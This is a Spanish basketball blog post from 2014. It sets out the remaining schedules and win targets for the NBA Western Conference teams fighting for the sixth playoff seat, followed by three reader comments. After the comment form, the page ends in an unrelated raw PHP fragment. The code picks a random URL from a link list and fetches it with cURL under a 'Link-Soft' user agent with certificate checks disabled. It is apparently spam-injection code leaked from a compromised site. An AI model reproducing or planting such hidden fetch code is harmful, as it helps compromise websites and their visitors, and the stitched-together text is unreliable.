Conferencia Oeste: ¿Qué hacer si quieres la 6ª plaza?

19 de March de 2014 por Nacho

Cuatro semanas y un día. Parece una condena, y para algunos lo será, pero es lo que queda de Regular Season.

A continuación, las exigencias realistas desde hoy hasta fin de mes para aquellos equipos del Oeste que quieren estar, y posicionarse bien, en los playoffs.

9º – PHOENIX SUNS – 38/29

Calendario: 19 vs. ORL; 21 vs. DET; 23 at MIN; 24 at ATL; 26 at WAS; 28 vs. NYK; 30 at LAL

7 partidos sin excesiva dificultad. Los renacidos Hawks y los lobos en back-to-back serán los más comprometidos junto con a la vista a la capital. 7 victorias es mucho pedir pero las necesitan. No deberían conformarse con menos de seis.

Exigencia: 44/30 para seguir soñando.

 

8º – MEMPHIS GRIZZLIES – 39/27

Calendario: 19 vs. UTA; 21 at MIA; 22 vs.IND; 24 vs. MIN; 26 at UTA; 28 at GSW; 30 at POR; 31 at DEN.

8 partidos, de los cuales cuatro son de los fáciles tramposos. Reciben y visitan a Utah, reciben a Minnesota y acaban el mes en Denver. Aquí es donde deben estar concentrados porque no se pueden permitir ni un despiste ante unos mejorados Nuggets, los siempre peligrosos Jazz (sobre todo en Salt Lake City) y con los Love and Cia. que al menos querrán dejar su muesca en partidos importantes. Además juegan ante los dos líderes del Este en back-to-back (telita) y disputan duelos directos fuera de casa en su ascenso de posiciones. Un 6/2 es necesario, y un 7/1 mejor pero harto complicado. Con menos de seis victorias que se vayan olvidando de la 6ª plaza.

Exigencia: Con seis victorias se colocarían con 45/29.

7º – DALLAS MAVERICKS – 40/27

Calendario: 19 vs. MIN; 21 vs. DEN; 23 vs. BKN; 25 vs. OKC; 27 vs. LAC; 29 vs. SAC.

Seis partidos, todos en casa, y todos cada dos días Dos accesibles contra Denver y Sacramento, dos trampas contra los Wolves y los Nets y dos cocos, Clippers y Thunder. Teniendo en cuenta que juegan en casa y descansando los fáciles y los trampas los deben ganar sí o sí en base a lo que se juegan y de los cocos al menos uno. Acaban de ganar a Durant y cia. en Oklahoma pero con los californianos acumulan dos derrotas esta temporada. Queda saber si Antonio Resines, profesor en Oklahoma para deleite de Luis Ciges, apoyará a Ibaka, y si éste será como el negro de “Amanece que no es poco”. Cinco victorias obligadas y deberían ir a por la sexta. Conseguir menos les puede complicar la vida si Phoenix cumple.

Exigencia: 45/28

6º – GOLDEN STATE WARRIORS – 43/26

Calendario: 20 vs. MIL; 22 vs. SAS; 28 vs. MEM; 30 vs. NYK.

Cuatro partiditos en casa y descansando nada menos que seis días entre el segundo y el tercero que es en los que se enfrentan a los cocos. Damos por supuestas las dos victorias ante los equipos del Este y nos vamos a la arena ante los de la Southwest. Para más inri, 1 y 2 de abril viajan a Texas para medirse a los Mavericks y devolver la visita a los Spurs. Aquí se va a ver si el pecio sigue cerca  del Oracleo se ha ido. Obviando los partidos de abril deberían sacar uno de estos dos partidos y si es el de MEM mejor, que es rival directo. Dos derrotas y peligra la sexta plaza, que por mucho que asusten los Clippers siempre es mejor enfrentarse a ellos que a los grandes cocos. Asumamos pues el 3 a 1, aunque con el 4 a 0 es probable que volaran a la quinta plaza.

Exigencia: 46/27

5º –  PORTLAND TRAIL BLAZERS – 44/24

Calendario: 20 vs. WAS; 22 at CHA; 24 at MIA; 25 at ORL; 27 at ATL; 28 at CHI; 30 vs. MEM.

Estos son los calendarios que miras y dices: “¡Ostias!¡La virgen!” Siete partidos, cinco fuera, salvo Orlando todos ante equipos de Playoffs y a los de Florida los visitas después de vértelas con Lebron. Y todo mientras te preguntas cuánto le queda a Aldridge… bufff. Partido a partido deberían sacar el de WAS en casa, el de Orlando fuera, el de Charlotte o el de Atlanta, y jugársela a una carta contra los osos, que hace poco ya le dieron un correctivo. Para entonces esperemos que esté LaMarcus. Esto les daría tres o cuatro victorias. Exijámosles cuatro sabiendo que pedimos mucho.

Exigencia: 48/27

Mirando por encima el calendario de Houston, no ha lugar a ponerlo en este gruppeto. Cinco partidos, cuatro fáciles y visita de los Clippers. Sería más acertado compararlos con los de arriba. De todas maneras veremos como queda la cosa el 1 de abril.

Comenta

3 comentarios a esta entrada

  1. Ruxixon dice:
    #1

    Si tuviera que apostar a algo diría que Warriors alcanzará la 5ª plaza debido al factor cansancio que parecen acumular las piernas en Portland.Por otra parte me gustaría que entrara Phoenix en PO,en lugar de Dallas,pero los tejanos no parecen por la labor,y visto su calendario se complica más el panorama.

      Citar

  2. Sancho88 dice:
    #2

    Pues hay 5 equipos en 6 victorias. Cualquier cosa puede pasar. Parece que Warriors y Blazers pueden mantener la quinta y sexta plaza, y la batalla real está entre Suns, Dallas y Grizzlies por la séptima y octava plaza. Yo creo que Dallas va a aguantar como sea, Nowitzki es seguro de vida, y los Grizzlies también, y que además les va a molar OKC o SAS porque son eliminatorias que a ellos les mola, les va la marcha. Grizzlies vs San Antonio ojalá, ojalá, ojalá. Va a ser el morbo asegurado. A muerte.

    Creo que por más que queramos ver a los Suns en postemporada… difícil lo van a tener.

      Citar

  3. suffer dice:
    #3

    Yo prefiero ver un Osos vs Thunder, creo que el equipo que mas le puede meter miedo en una serie a Durant son los Osos y su juego, ademas asi se podria dar un SA vs Dallas en un duelo tejano. Y sigo queriendo ver un Warriors vs Clippers. Segun estas llaves serian lo ideal para ver expectaculo y muchas sopresas.

    Pero es bastante probable que los Blazers bajen, es mas hasta los veo 7° si las cosas no le salen bien, por lo que moveria muchos encuentros, ademas por las lesiones e irregularidad de los Warriors es probable que puedan caer un puesto si Dallas sigue presionando.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>